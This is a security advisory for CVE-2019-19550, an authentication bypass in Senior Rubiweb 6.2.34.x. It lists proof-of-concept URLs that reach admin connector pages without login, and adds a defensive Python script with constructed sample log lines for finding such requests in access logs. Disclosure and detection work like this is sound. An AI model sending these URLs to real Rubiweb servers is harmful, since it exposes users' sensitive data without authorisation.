CVE-2019-19550
[Description]
Remote authentication bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 allows admin-level access to sensitive information of users of the affected versions. The attacker only needs to request the correct URL.
[Important Dates]
- Announcement (to Vendor): 2019-12-02
- Public disclosure date: 2020-01-30
[Vulnerability Type]
Incorrect Access Control
[Vendor of Product]
Senior
[Affected Product Code Base]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- Other versions may be affected, especially others in the same family (not yet tested)
[Affected Component]
Rubiweb
[Attack Type]
Remote
[Impact Information Disclosure]
True
[Attack Vectors]
Sensitive information is reachable without authentication or any other special requirement; only the correct URI is needed.
[Has vendor confirmed or acknowledged the vulnerability?]
True
[PoC - Proof of Concept]
- Connect to the authenticated portal to confirm the presence and version of the affected product:
  - hXXp://subdomain.customer.tld:8080/rubiweb/
- Access the vulnerable pages (admin functions reachable without authentication):
  - hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
  - hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
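As an added example that is not part of this advisory or of Rubiweb itself, the following Python check scans web-server access logs for requests to the connector actions listed above, so a defender can find out whether the unauthenticated admin pages were reached. The log line format (combined/common log format), the regex and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Connector actions named in the advisory as reachable without authentication.
VULNERABLE_ACTIONS = {"EXESENHA", "ENTRANCEREL"}

# Assumed common/combined log format: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_bypass_request(target: str) -> bool:
    """True when the request targets /rubiweb/conector with an advisory-listed ACAO action."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/rubiweb/conector"):
        return False
    # Normalise query keys so ACAO/acao are treated alike; values compared case-insensitively.
    query = {k.upper(): v for k, v in parse_qs(parts.query).items()}
    actions = {a.upper() for a in query.get("ACAO", [])}
    return bool(actions & VULNERABLE_ACTIONS)


def scan_log(lines):
    """Return (client, timestamp, target, status) for each matching request; skip unparsable lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_bypass_request(m["target"]):
            hits.append((m["client"], m["ts"], m["target"], int(m["status"])))
    return hits


# Constructed sample access-log lines (not real traffic; addresses are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jan/2020:10:15:01 -0300] "GET /rubiweb/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Jan/2020:10:15:04 -0300] "GET /rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1 HTTP/1.1" 200 8811',
    '203.0.113.7 - - [30/Jan/2020:10:15:09 -0300] "GET /rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU HTTP/1.1" 200 12044',
    '198.51.100.3 - - [30/Jan/2020:10:16:00 -0300] "POST /rubiweb/conector?ACAO=OTHERACTION&SIS=FP HTTP/1.1" 302 0',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for client, ts, target, status in scan_log(SAMPLE_LOG):
        print(f"{ts} {client} -> {target} ({status})")
```

A 200 status on a hit means the page was served without a session, which is the condition the advisory describes; a 302 to the login page after patching is the expected result.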
[Discoverer]
Mauricio Santos (R&D UnderProtection) and Hesron Hori (R&D UnderProtection)
[Thanks to]
Senior (vendor) Information Security Team, who collaborated on a coordinated disclosure